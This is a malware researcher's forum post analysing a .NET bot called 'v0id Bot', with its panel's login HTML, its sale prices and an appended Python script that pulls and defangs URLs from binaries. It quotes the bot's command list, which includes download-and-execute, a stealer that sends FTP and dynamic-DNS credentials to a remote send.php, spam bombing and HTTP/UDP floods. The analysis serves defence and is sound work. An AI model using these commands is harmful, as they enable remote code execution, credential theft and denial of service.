Author Topic: v0id Bot  (Read 3748 times)


March 03, 2010, 08:37:02 am

SysAdMini

Yesterday a malware researcher asked me what this sample does.

http://www.virustotal.com/analisis/ec295ccdc2f03cc642a57b60bf1340fcc3ec2b8ecb61b0ee648c9b3bb6af7427-1267604113

It is a .NET application. Online analysis services don't show any malicious activity.

Looking at the strings inside the file reveals a URL.

nexus88.scene-hosting.info/bot/
It is a control panel for something called "v0id Bot".

Quote
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>v0id Bot ::: Login</title>
<link href="css/main.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="main">
<center><p class="caption">Login</p>
<form action="index.php" method="post">

  <p class="text-norm">
    <label> Username</label>
    <br />
    <input class="txtdborder" type="text" name="user" tabindex="1" />
    <br />
    <label>Password</label>
    <br />
    <input class="txtdborder" type="password" name="pw" tabindex="2" />
    <br />
    <br /> 
    <input class="btndoubleborder" type="submit" name="submit" id="submit" value="Absenden" tabindex="3" />
  </p>
</form><br />

  <p class="named">Design and Code by RedShark</p>
  </center>
  </div>
</body>
</html>

But what is "v0id Bot"? Googling for the name returns this result.

http://tool-store.info/?page_id=52
It seems to be a new bot and is probably of German origin.

Here is a translation of the function list:

(+) stop bot -> specific bot -> [end] pcname
(+) stop all bots                -> [endall]
(+) open website (hidden)  -> [run] www.google.de number
(+) open website (hidden)  -> [visit] www.google.de number
(+) download & execute     -> [dl] www.server.com/serv.exe 1 (1=execute 0=download only)
(+) switch to host until next reboot  -> [host] website
(+) display computername   -> [pcname]
(+) e-mail spam/bombing    -> [spam] youremail@mail.ru victim@mail.ru Subject Body SMTP PORT Mailpass
(+) stealer (No-ip,DynDns & Filezilla) -> [steal] yourwebsite.com/send.php
(+) HTTP Flood                   -> [http] www.google.de intervalinms threads
(+) UDP Flood                    -> [udp] host port threads sockets

Price:

v0id Bot Builder FUD = 10 PSC
v0id Bot Builder FUD + 2 FUD Stubs Update = 20 PSC
Gold -> v0id Bot Builder FUD + Unlimited FUD Stubs + Support = 50 PSC

Contact: 560281951
Ruining the bad guy's day
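
The string triage described in the post, as an added example that is not part of the original post: .NET assemblies store string literals as UTF-16LE, so a scan has to cover both ASCII and UTF-16LE runs to surface a scheme-less host/path such as the panel address. The sample bytes and the host `panel.example.test` are constructed for illustration.

```python
import re

# Printable ASCII runs, and the same characters stored as UTF-16LE
# (.NET keeps string literals in the #US heap as UTF-16LE).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
# Host with an optional scheme and a path, e.g. "host.example/bot/".
HOST_PATH = re.compile(
    r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}/[^\s\"'<>]*", re.I)


def extract_strings(data):
    """Yield (offset, encoding, text) for ASCII and UTF-16LE runs."""
    for m in ASCII_RUN.finditer(data):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(data):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def defang(url):
    """Make an indicator non-clickable before it goes into notes."""
    return url.replace(".", "[.]")


def find_urls(data):
    """Return sorted (file offset, encoding, defanged URL) hits."""
    hits = []
    for off, enc, text in extract_strings(data):
        width = 2 if enc == "utf-16le" else 1
        for u in HOST_PATH.finditer(text):
            hits.append((off + width * u.start(), enc, defang(u.group())))
    return sorted(hits)


# Constructed sample: PE-like header bytes, two ASCII import names, then
# two UTF-16LE literals as a .NET compiler would emit them.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"mscoree.dll\x00_CorExeMain\x00"
    + b"\x01\x2f" + "panel.example.test/bot/".encode("utf-16le") + b"\x00\x00"
    + b"\x05\x11" + "[pcname]".encode("utf-16le") + b"\x00"
)

if __name__ == "__main__":
    for offset, encoding, url in find_urls(SAMPLE):
        print(f"0x{offset:04x}  {encoding:8}  {url}")
```

An ASCII-only scan of the same bytes returns the import names but not the panel address, which is why the UTF-16LE pass matters for .NET samples.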